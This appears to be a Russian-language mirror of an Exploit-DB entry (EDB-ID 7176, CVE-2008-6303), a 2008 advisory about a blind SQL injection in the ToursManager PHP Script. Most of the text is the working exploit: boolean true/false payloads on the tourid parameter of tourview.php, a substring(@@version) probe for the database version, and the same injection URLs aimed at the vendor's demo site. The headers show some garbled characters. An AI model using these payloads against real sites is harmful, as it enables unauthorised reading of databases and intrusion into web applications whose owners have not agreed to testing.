- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7176
- Проверка EDB
-
- Пройдено
- Автор
- XADOS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6303
- Дата публикации
- 2008-11-20
Код:
[>] Name:--> ToursManager PhP Script <= Blind Sql Injection
[>] Discovered by:--> XaDoS
[>] ContacT m&:--> xados[at]hotmail.it
[>] Site:--> http://www.toursmanager.com
#########
[■] £XpLoIT:
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true)
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false)
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false)
V=> 5.x.x XD
#########
[â– ] D&M0:
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5
#########
[â– ] Th4Nks T0:
\> Boom3rang </ (very kind) ;-)
\> Langy </
\> Str0ke </
#########
# milw0rm.com [2008-11-20]- Источник
- www.exploit-db.com
